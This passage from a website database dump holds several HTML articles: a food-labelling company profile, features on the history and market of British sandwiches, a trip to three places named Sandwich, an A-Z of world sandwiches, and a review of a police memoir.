st_title=\"Labelled with love\" st_url=\"http://westonspirit.org.uk/2012/05/labelled-with-love/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Labelled with love\" st_url=\"http://westonspirit.org.uk/2012/05/labelled-with-love/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Labelled with love\" st_url=\"http://westonspirit.org.uk/2012/05/labelled-with-love/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Labelled with love\" st_url=\"http://westonspirit.org.uk/2012/05/labelled-with-love/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Whether it’s meeting legal requirements or flying the flag for the best in home-grown products, top-quality labelling is a must for caterers</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2043\" title=\"Planglow\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Planglow.jpg\" alt=\"\" width=\"596\" height=\"355\" />Market-leading label and biopackaging company Planglow has been providing products and software to caterers for 25 years.</p>&#13;\n<p>Launched in the mid-1980s, Planglow brought its own specially developed software to an industry it felt lacking in simple-to-produce and easily customisable food labelling options. LabelLogic – as Planglow’s software is now called – has gone from strength to strengthand today is used by more than 10,000 caterers  around the globe.</p>&#13;\n<p>The company also offers three off-the-shelf packaging ranges (with matching labels), plus hundreds of other label and ticketing options which can be customised at the touch of a button using LabelLogic. It also provides bespoke design and complete rebranding services which can be applied to uniforms, signage and vehicles as well as labels and packaging.</p>&#13;\n<p>Planglow is proud to create products that both accommodate and anticipate market trends – from the shifting legal requirements of labelling to speciality breads or events – providing fresh and exciting ways to present food and drinks. With this in mind, Planglow has just launched its new British-made Best of British label, which flies the flag for Britain and its produce.</p>&#13;\n<p>Offering a low-cost and minimal-storage alternative to bulky Brit-branded packaging, Best of British celebrates Great British events – both now and for years to come – as well as homemade or home-grown produce from sandwiches, salads and soups to cookies, cakes and much, much more.</p><div class=\"woo-sc-hr\"></div>&#13;\n<h4>0117 317 8600</h4>&#13;\n<h4><em><a href=\"http://www.planglow.com/\" target=\"_blank\">www.planglow.com</a></em></h4>&#13;\n									</div>','Labelled with love','Whether it’s meeting legal requirements or flying the flag for the best in home-grown products, top-quality labelling is a must for caterers','publish','open','open','','labelled-with-love','','','2018-04-02 20:06:10','2018-04-02 20:06:10','',0,'http://westonspirit.org.uk/labelled-with-love.asp',0,'post','',0),(179,1,'2017-01-13 03:34:10','2017-01-13 03:34:10','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Our daily bread\" st_url=\"http://westonspirit.org.uk/2012/05/our-daily-bread/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Our daily bread\" st_url=\"http://westonspirit.org.uk/2012/05/our-daily-bread/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Our daily bread\" st_url=\"http://westonspirit.org.uk/2012/05/our-daily-bread/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Our daily bread\" st_url=\"http://westonspirit.org.uk/2012/05/our-daily-bread/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Our daily bread\" st_url=\"http://westonspirit.org.uk/2012/05/our-daily-bread/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>More people work in the UK’s commercial sandwich industry than in agriculture. How did the nation’s snack of choice take over the world? Bee Wilson fills us in…</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2005\" title=\"Girl eating a sandwich\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/57308152.jpg\" alt=\"Our daily bread\" width=\"596\" height=\"519\" />Few people try to tickle the taste buds of Michel Roux Jr on MasterChef with a humble sandwich, and a good old-fashioned doorstep sarnie is unlikely to feature in fine foodie magazines.</p>&#13;\n<p>But something tasty slapped between two slices of bread is a staple lunchtime diet for many of us. So much so that we are each thought to consume around 200 of them every year. Consequently, the commercial sandwich industry in the UK now employs a colossal 330,000 people – more than the number working in agriculture.</p>&#13;\n<p>Indeed, the sandwich may be our greatest culinary invention; it’s certainly our most successful food export. The world has quietly taken our favourite snack to its heart and re-fashioned it as panini and BLTs, the bocadillo of Spain and the chivito of Uruguay.</p>&#13;\n<p>As a nation, we may not have the fussy insistence on fresh ingredients of the Italians or the sauce-making abilities of the French. But we are good structural engineers and the sandwich is a great piece of engineering, one forever associated with an impatient 18th-century British earl.</p>&#13;\n<p>It seems pretty obvious, however, that John Montagu – the 4th Earl of Sandwich (1718- 1792) – was not the first person to eat meat and bread together. For centuries, people had constructed ad hoc sandwiches on their plates but it was Montagu who imperiously called for his meal to arrive ready-made.</p>&#13;\n<p>The story goes that he was too engrossed in an all-night card game to leave the table to eat. Another version has sandwich busily working at his desk and needing something he could eat with a single hand.</p>&#13;\n<p>This version has the ring of truth, firstly because Sandwich was not much of a gambler and secondly because sandwiches are the ultimate workaholic food. This hand-held fuel is eaten by lawyers and doctors, school children and their teachers, shop workers, call centre operatives and everyone else with little chance of a proper lunch break.</p>&#13;\n<p>The British commercial sandwich market has grown 6 per cent in the last year. Jim Winship, director of the British Sandwich Association, says the growth has much to do with the economy climate.</p>&#13;\n<div class=\"woo-sc-quote boxed\"><p>“People are under pressure at work and feel they need something to eat at a desk without stopping,” he says.</p></div>&#13;\n<p>Few foods are as portable. Compare and contrast the open sandwiches of Scandinavia – smorrebrod and the like, topped with smoked fish, herrings or pâté – which are far more complicated to carry around. In Norway, they have paper wrappings to keep the open sandwich safe in transit: a first layer of paper to protect the filling and a second layer to contain the bread.</p>&#13;\n<p>The genius of the sandwich is that it can contain almost anything from the paper-thin cucumber slices of an aristocratic afternoon tea to a hearty wedge of left-over roast dinner with stuffing. In two slices of bread, it is possible to fashion a complete, meal with all the vitamins, protein and carbohydrate the health experts recommend.</p>&#13;\n<p><img class=\"alignright  wp-image-2009\" title=\"Beetroot Sandwich\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Beetroot-02.jpg\" alt=\"OUr daily bread 2\" width=\"180\" height=\"270\" />However, not every sandwich is quite so wholesome: the jam butty probably has nutritionists choking on their crusts while Mrs Beeton suggested a sandwich for invalids filled with toast. That’s the glory of sandwiches – they can be posh (dainty triangles), fit for ordinary working families (baps and butties) or the food of leisure (picnics). They can be made from the finest ingredients – the Edwardian shooter’s sandwich contains a fillet steak encased in a whole loaf – or be thrown together with whatever’s in the fridge.</p>&#13;\n<p>And for people who feel oppressed by conventional meals, sandwiches offer liberation.</p>&#13;\n<p>In his book Family Britain, the social historian David Kynaston quoted a woman who became a widow in the 1970s: “At last! No more cooking. I can eat what I really like – sandwiches!”</p>&#13;\n<p>For those of us who love sociable meals, there would be something sad about a life in which all you ate was sandwiches. But for the busy middle hours of the day, the sober individualism of the sandwich is often what is wanted. And an easy way to improve the working week is simply . . . better sandwiches.</p><div class=\"woo-sc-hr\"></div> <em><strong>Bee Wilson</strong></em> is an award-winning food writer and author of <em>Sandwich: A Global History (Reaktion)</em>. &#13;\n									</div>','Our daily bread','More people work in the UK’s commercial sandwich industry than in agriculture. How did the nation’s snack of choice take over the world? Bee Wilson fills us in','publish','open','open','','our-daily-bread','','','2018-04-02 20:06:08','2018-04-02 20:06:08','',0,'http://westonspirit.org.uk/our-daily-bread.asp',0,'post','',0),(180,1,'2017-09-09 21:28:56','2017-09-09 21:28:56','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> m-byrne\" title=\"Posts by Maureen Byrne\" rel=\"author\"&gt;Maureen Byrne</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Packing a punch\" st_url=\"http://westonspirit.org.uk/2012/05/packing-a-punch/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Packing a punch\" st_url=\"http://westonspirit.org.uk/2012/05/packing-a-punch/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Packing a punch\" st_url=\"http://westonspirit.org.uk/2012/05/packing-a-punch/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Packing a punch\" st_url=\"http://westonspirit.org.uk/2012/05/packing-a-punch/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Packing a punch\" st_url=\"http://westonspirit.org.uk/2012/05/packing-a-punch/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>Imagine life without the takeaway sandwich? Three billion are sold each year but 30 years ago it was a new idea that might not catch on.</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2012\" title=\"Subway-sandwich market feature\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Subway-sandwich-market-feature.jpg\" alt=\"\" width=\"596\" height=\"395\" />When Marks &amp; Spencer bosses introduced packaged sandwiches on a trial basis in five of its stores 30 years ago, little could they have imagined what they were starting.</p>&#13;\n<p>The retail sandwich market is today worth £6 billion, with British consumers munching our way through three billion shop-bought sandwiches each year.</p>&#13;\n<p>So what are those three billion sandwiches – and where do we buy them? According to the British Sandwich Association (BSA), Britain’s favourite sandwich is chicken salad, followed by prawn mayonnaise.</p>&#13;\n<p>Marks &amp; Spencer, which started it all, reports that its prawn and mayo sandwich has been its bestseller for all those 30 years. “Over six million prawn mayo sandwiches are sold each year, using 390 tonnes of prawns,” says M&amp;S Sandwich buyer Lisa Oaten.</p>&#13;\n<p>The biggest sandwich retailer in the UK is now the Subway franchise chain, with 1,432 stores. The firm is ahead of Tesco, Greggs and Marks &amp; Spencer in the value of sandwiches its stores sell, although Tesco outsells Subway in terms of volume.</p>&#13;\n<p>Smaller sandwich shops and franchise chains tend to make their sandwiches on the premises, but large retail chains, convenience store groups and petrol forecourts will source theirs from companies such as Greencore, which delivers 320 million sandwiches a year from its four UK factories. “We make 45,000 deliveries a week to convenience stores alone,” says chief executive Patrick Coveney.</p>&#13;\n<p>The manufacturing process is highly automated. Bread is buttered automatically and robots deposit mayonnaise-based fillings, but more intricate tasks are still done by hand. “No robot can put four thin slices of tomato in a sandwich,” Coveney adds.</p>&#13;\n<p>And with 300,000 employees, the sandwich-making industry is a bigger employer overall than the nation’s agricultural sector.</p>&#13;\n<p>Thirty years ago it was the concept of a pre-packed sandwich which was the catalyst for growth. The packaging innovation continues, ironically now making the large retailers’ takeaway sandwiches look as though they have been bought from a local delicatessen.</p>&#13;\n<p>And the British Sandwich Association reports that the recession has had little effect on the market, with sales growing by 3.6 per cent over the past year. “There has been a surge in the premium end of the market, which balances out losses at the lower end,” says BSA chief executive Jim Winship.</p>&#13;\n<p>The contentious recent proposal by the government to impose VAT on all hot snacks (not just those prepared to order as previously) is causing concern, though.</p>&#13;\n<p>At Earl of Sandwich, a chain run by the heirs of the famous earl, chief executive Orlando Montagu says: “Our delicious hot sandwiches are made to order and pretty good value. They would be even better value if we didn’t have to charge 20 per cent VAT on them just because they are hot!”</p>&#13;\n<p><img class=\" wp-image-2013 alignleft\" title=\"Food_sum12_jubilee_onmove_19\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Food_sum12_jubilee_onmove_19.jpg\" alt=\"\" width=\"180\" height=\"182\" />On a more positive note, this year’s Diamond Jubilee and the London Olympics will see special “themed” sandwiches go on sale. For example, Tesco will be launching some fillings under a “British Limited Edition” banner, including scotch egg and pickle. Marks &amp; Spencer will also be celebrating, with the launch of roast beef and Yorkshire pudding and even pork pie sandwiches.</p>&#13;\n<p>Thirty years on, the sandwich revolution continues.</p><div class=\"woo-sc-hr\"></div> &#13;\n									</div>','Packing a punch','Imagine life without the takeaway sandwich? Three billion are sold each year but 30 years ago it was a new idea that might not catch on, says Maureen Byrne','publish','open','open','','packing-a-punch','','','2018-04-02 20:06:07','2018-04-02 20:06:07','',0,'http://westonspirit.org.uk/packing-a-punch.asp',0,'post','',0),(181,1,'2015-09-18 07:22:56','2015-09-18 07:22:56','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Roll on another 250 years\" st_url=\"http://westonspirit.org.uk/2012/05/roll-on-another-250-years/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Roll on another 250 years\" st_url=\"http://westonspirit.org.uk/2012/05/roll-on-another-250-years/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Roll on another 250 years\" st_url=\"http://westonspirit.org.uk/2012/05/roll-on-another-250-years/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Roll on another 250 years\" st_url=\"http://westonspirit.org.uk/2012/05/roll-on-another-250-years/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Roll on another 250 years\" st_url=\"http://westonspirit.org.uk/2012/05/roll-on-another-250-years/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Here’s a British tradition that’s worth making a meal over. Get ready for the summer of the sandwich…</h4>&#13;\n<p style=\"text-align: center;\"><em><span style=\"color: #ff0000;\"><strong>Happy birthday to the great British sandwich!</strong></span></em></p>&#13;\n<p><img class=\"alignright size-full wp-image-1996\" title=\"Balloons\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/BALLOONS.jpg\" alt=\"Roll on another 250 years\" width=\"596\" height=\"397\" />The ultimate convenience food is 250 years old this week, and there is much to celebrate as this supplement will demonstrate.</p>&#13;\n<p>Said to have been created as a bread-and-meat combination for the Earl of Sandwich at his gambling table in 1762, the snack-ondemand of an 18th-century nobleman has evolved into a food enjoyed worldwide, as Bee Wilson discusses on page 5.</p>&#13;\n<p>We buy at least 3 billion ready-made sandwiches each year. This consumer demand, coupled with advances in manufacturing and packaging, means that the sandwich industry has become a major player in our economy and high street, as you can read on page 6.</p>&#13;\n<p>Market research analyst Mintel says the sandwich is the lunch option of choice for about 75 per cent of us. But this doesn’t mean that it has to be confined to midday meals. Leading chefs have contributed a dazzling array of menus to pages 8 and 9 which show that the sandwich is suitable for any occasion.</p>&#13;\n<p>British Sandwich Week (13-19 May) is launched tomorrow, with Big Picnics in London, Newcastle and Plymouth,  and major retailers donating sandwiches to charity events in those cities.</p>&#13;\n<p>When the celebrations are over there will still be opportunities to enjoy this national treasure. As pages 12 and 13 illustrate, this will be the summer of the street party and the picnic, with patriotic sandwiches and fillings  commemorating the Diamond Jubilee, the Olympics and Paralympics.</p>&#13;\n<p>The British sandwich will remain centre stage in 2017.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>Stephanie Sparrow – Editor</em></p>&#13;\n									</div>','Roll on another 250 years','Here’s a British tradition that’s worth making a meal over. Get ready for the summer of the sandwich…','publish','open','open','','roll-on-another-250-years','','','2018-04-02 20:06:05','2018-04-02 20:06:05','',0,'http://westonspirit.org.uk/roll-on-another-250-years.asp',0,'post','',0),(182,1,'2016-08-11 10:17:07','2016-08-11 10:17:07','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"When in Sandwich, do as the sandwichers do\" st_url=\"http://westonspirit.org.uk/2012/05/when-in-sandwich-do-as-the-sandwichers-do/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"When in Sandwich, do as the sandwichers do\" st_url=\"http://westonspirit.org.uk/2012/05/when-in-sandwich-do-as-the-sandwichers-do/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"When in Sandwich, do as the sandwichers do\" st_url=\"http://westonspirit.org.uk/2012/05/when-in-sandwich-do-as-the-sandwichers-do/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"When in Sandwich, do as the sandwichers do\" st_url=\"http://westonspirit.org.uk/2012/05/when-in-sandwich-do-as-the-sandwichers-do/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"When in Sandwich, do as the sandwichers do\" st_url=\"http://westonspirit.org.uk/2012/05/when-in-sandwich-do-as-the-sandwichers-do/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>What do Sandwich dwellers eat? We take a trip to three towns named after the famous snack.</h4>&#13;\n<p>It may be 60 miles from the spot where the Earl of Sandwich reputedly ordered a snack and changed the course of food history, but the picturesque Kent town of Sandwich has a claim to being the home of the sandwich.</p>&#13;\n<p>And it’s egg and cress and smoked salmon varieties that tempt the local palate most, according to Dominic Parker of the Salutation country house and tea rooms in the town.</p>&#13;\n<p>He and other businesses in local trade association the Sandwich Guild are also behind a longer-term initiative to revive the Kentish huffkin, a wide flat bread roll with a soft crust.</p>&#13;\n<p>Three thousand miles away in the Massachusetts seaside town of Sandwich, named after the Kentish town by early Quaker settlers, tastes are very different. Bob King, who runs the Café Chew with the motto “Have a Sandwich in Sandwich”, says: “Our most popular sandwich right now is the Smokey Dutchman: turkey breast, lettuce, tomato, smoked bacon, and smoked Gouda cheese on a Bavarian pretzel roll with herbed mayonnaise.”</p>&#13;\n<p></p><div id=\"attachment_2055\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-2055\" title=\"139898640\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/139898640.jpg\" alt=\"Sandwich Islands\" width=\"596\" height=\"462\" /><p class=\"wp-caption-text\">Hawaii, formerly the Sandwich Islands</p></div>&#13;\n<p>Spin the globe to the Sandwich Islands discovered by Captain Cook in 1779 and named after his sponsor – it’s that earl again. We know the islands as Hawaii today.</p>&#13;\n<p>Leading chef Alan Wong, whose eponymous restaurant in Honolulu is a favourite of Barack Obama, uses the sandwich to promote Hawaiian cuisine.</p>&#13;\n<p>His version of the BLT includes kalua pig – a traditional dish of slow-cooked pork – in a grilled onion bun with garlic flavoured Boursin cheese, tomatoes and lettuce.</p>&#13;\n<p>He says: “Our other popular sandwiches include one with local mahi-mahi fish fried using a Japanese tempura batter that is light and crispy. The sandwich is then served with a tsuyu, a light soy-based dipping sauce.</p>&#13;\n<p>“Most of our sandwiches consist of ingredients between two slices of bread but in the past we’ve used a malasada, a Sweet, fried Portuguese doughnut.”</p><div class=\"woo-sc-hr\"></div> &#13;\n									</div>','When in Sandwich, do as the sandwichers do','What do Sandwich dwellers eat? We take a trip to three towns named after the famous snack. By Paul Erlam','publish','open','open','','when-in-sandwich-do-as-the-sandwichers-do','','','2018-04-02 20:06:04','2018-04-02 20:06:04','',0,'http://westonspirit.org.uk/when-in-sandwich-do-as-the-sandwichers-do.asp',0,'post','',0),(183,1,'2015-05-28 00:51:31','2015-05-28 00:51:31','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"World on a plate\" st_url=\"http://westonspirit.org.uk/2012/05/world-on-a-plate/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"World on a plate\" st_url=\"http://westonspirit.org.uk/2012/05/world-on-a-plate/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"World on a plate\" st_url=\"http://westonspirit.org.uk/2012/05/world-on-a-plate/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"World on a plate\" st_url=\"http://westonspirit.org.uk/2012/05/world-on-a-plate/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"World on a plate\" st_url=\"http://westonspirit.org.uk/2012/05/world-on-a-plate/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>From the fluffernutter to the tramezzini, food historian Bee Wilson dishes up a mouthwatering A-Z of sandwiches worldwide</h4>&#13;\n<p><strong><img class=\"alignright size-full wp-image-2001\" title=\"Open Sandwich\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Open-Box.jpg\" alt=\"world on a plate\" width=\"596\" height=\"339\" />Bacon Buttie</strong> (also known as bacon sanger, bacon sarnie,piece ’n’ bacon) – Origin: British but also now beloved in Canada, Australia, New Zealand.</p>&#13;\n<p>This apparently basic sandwich inspires heated debate over the correct components. Streaky or back? Toast or soft bread?</p>&#13;\n<p><strong>Bánh Mì</strong> – Origin: Vietnam at the time of French Indochina.</p>&#13;\n<p>This sandwich, often cited as the greatest in the world, is a hybrid of French baking skills and Vietnamese flavouring. The bread is baguette but lightened with rice flour. The filling is typically marinated pork, lightly pickled carrots and daikon radish, chilli and coriander.</p>&#13;\n<p><strong>Choripán</strong> - Origin: Argentina.</p>&#13;\n<p>Grilled chorizo, sometimes sliced “mariposa” (like a butterfly) inside crusty white bread with a sharp and herby chimichurri sauce. Argentina is a great sandwich nation from lomito, an addictive steak sandwich, to the soft and crustless sandwiches de Miga sold in cafes.</p>&#13;\n<p><strong>Croque-Monsieur</strong> – Origin: Paris café fare first served around 1910.</p>&#13;\n<p>White toast, thin cooked ham, mild cheese (Emmenthal or Gruyère) and, crucially, a layer of Béchamel. A Croque-Monsieur without Béchamel is nothing but a cheese and ham toastie. Variations include the Croque-Madame (with a fried egg) the Croque-Señor (with salsa), and the Croque-Hawaiian (with pineapple).</p>&#13;\n<p><strong>Fluffernutter</strong> – Origin: New England, U.S.A.</p>&#13;\n<p>Peanut butter and “marshmallow fluff” from a jar on sliced white. This cousin of the PBJ (peanut butter and jelly) represents the junkier end of American sandwich making (see also the Elvis: mashed bananas and peanut butter, sandwiched and fried in bacon fat).</p>&#13;\n<p><strong>Sub (AKA hero, hoagie, grinder)</strong> – Origin: East Coast, US.</p>&#13;\n<p>A soft Italian loaf split lengthwise and filled with a variety of cold cuts, salad vegetables and oil and vinegar; hot versions may include meatballs in tomato sauce or a breaded veal cutlet.</p>&#13;\n<p><strong>Toastie</strong> (AKA jaffle, melt, breville, panini) – Origin: Sandwiches made with toast have been recorded since the 18th-century and jaffles, made with a jaffle iron, were sustenance in the Australian outback. The electric toasted sandwich maker was launched in 1974.</p>&#13;\n<p>Any filling sandwiched between any bread, toasted until bubbling. India is currently making best use of the concept having discovered that leftover vegetable curries, assuming they are not too wet, make a wonderful toasted sandwich, sealed inside sliced bread. Good flavours include saag paneer and aloo gobi. Special sandwich masalas, or spice mixes, are sold for seasoning them.</p>&#13;\n<p><strong>Tramezzini</strong> – Origin: Italy.</p>&#13;\n<p>Elegant white sandwiches cut on the diagonal with such fillings as chicken and artichoke or spinach and goat’s cheese. Tramezzini are a descendant of the English afternoon tea finger sandwich but instead of being nibbled with a cup of Darjeeling at 4pm, they are eaten with a glass of cold white wine in the early evening.</p>&#13;\n<p><strong>Wrap</strong> – Origin: Middle East.</p>&#13;\n<p>Flatbread wrapped around any filling. Some regard wraps with suspicion and the cold cardboardy supermarket versions often disappoint. But they are probably the oldest form of sandwich; from the falafel of Israel to the shawarma of the Arab world, a good flatbread can be texturally satisfying. The key is warm bread and seasoning. </p><div class=\"woo-sc-hr\"></div> &#13;\n									</div>','World on a plate','From the fluffernutter to the tramezzini, food historian Bee Wilson dishes up a mouthwatering A-Z of sandwiches worldwide','publish','open','open','','world-on-a-plate','','','2018-04-02 20:06:02','2018-04-02 20:06:02','',0,'http://westonspirit.org.uk/world-on-a-plate.asp',0,'post','',0),(184,1,'2017-08-20 17:57:07','2017-08-20 17:57:07','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">18 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> ojones\" title=\"Posts by Olga B. Jones\" rel=\"author\"&gt;Olga B. Jones</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bibliophile’s Corner. Curbcheck by Zach Fortier.\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-curbcheck-by-zach-fortier/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bibliophile’s Corner. Curbcheck by Zach Fortier.\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-curbcheck-by-zach-fortier/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bibliophile’s Corner. Curbcheck by Zach Fortier.\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-curbcheck-by-zach-fortier/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bibliophile’s Corner. Curbcheck by Zach Fortier.\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-curbcheck-by-zach-fortier/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bibliophile’s Corner. Curbcheck by Zach Fortier.\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-curbcheck-by-zach-fortier/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><img class=\"alignright size-full wp-image-2404\" title=\"Curbcheck cvr\" src=\"/wp-content/uploads/2012/06/Curbcheck-cvr1.jpg\" alt=\"\" width=\"300\" height=\"400\" />From the testimonials: “Curbcheck chronicles the experiences of a police officer as he transitions from a new boot with challenging life experiences to a salty veteran who has been baptized into the dark side of reality by countless hours on the street.”</p>&#13;\n<p>This is a story of law and order uncensored. We watch crime shows on TV and treat it as just fiction. There’s often a clear divide between the bad guys and the good guys and although sometimes the writers of those TV shows show us that things aren’t so black and white it’s still TV, still fiction. This book isn’t fiction. It’s the real deal and it shows the ugliness on both sides of the law in no uncertain terms. We’re all human, regardless of what we do for a living. I liked Forthier’s no-nonsense style of writing devoid of embellishments or sugar-coating. Things are what they are and there’s that. It’s not all heavy though, there’s humour and a pretty funny story mixed in with the episodes that are anything but. I could tell that despite everything he’s been through the author hasn’t lost his ability to laugh, even if it’s the kind of laughter that’s tinged with bitterness.</p>&#13;\n<p>The book is set up as a series of episodes talking about the cases Forthier worked as a police officer in his hometown after coming back from military duty. It’s clear that he came to the force with certain preconceived notions about the job and the people he’d be working with and when reality intervened I think the adjustment was a difficult process that took time and left its own scars. The stories within each chapter are grouped based on common themes which give each episode more impact. The author talks about his experiences and his reasons for doing things a certain way as well as the challenges of the job. It’s clear why he didn’t make many friends among other police officers and that the people he wasn’t friends with back then aren’t going to be won over by this book. The book is well-written with pacing, narrative, dialogue and voice working together and creating a satisfying reading experience.</p>&#13;\n<p>The only thing I wasn’t particularly fond of was the formatting. As I’ve mentioned before the various episodes are grouped into chapters but there’s nothing that separates these episodes. I think it would’ve been easier to differentiate one story from the other while still preserving the effect by allowing for a divider symbol or extra space between the paragraphs. The 1.5 spacing wasn’t my favourite either because it made the book look like a manuscript, which, while easy to read, doesn’t make the book look and feel like a finished product. If you’re sensitive to graphic violence or rough language this book is not for you. Work life of a police officer is filled with crime, altercations and profanity, so that’s what you get in Curbcheck. However, if you want to see what a real cop has to say about his time on the job I believe that you’ll enjoy this book. And maybe next time you watch a cop show you’ll think about what you see a little differently. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Bibliophile’s Corner. Curbcheck by Zach Fortier.','From the testimonials: Curbcheck chronicles the experiences of a police officer as he transitions from a new boot with challenging life experiences to a salty','publish','open','open','','bibliophiles-corner-curbcheck-by-zach-fortier','','','2018-04-02 20:06:00','2018-04-02 20:06:00','',0,'http://westonspirit.org.uk/bibliophiles-corner-curbcheck-by-zach-fortier.asp',0,'post','',0),(185,1,'2017-07-05 03:26:44','2017-07-05 03:26:44','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">26 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> ojones\" title=\"Posts by Olga B. Jones\" rel=\"author\"&gt;Olga B. Jones</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bibliophile’s Corner. Trade Winds to Meluhha by Vasant Davé\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bibliophile’s Corner. Trade Winds to Meluhha by Vasant Davé\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bibliophile’s Corner. Trade Winds to Meluhha by Vasant Davé\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave/\" displaytext=\"twitter\"></span><span 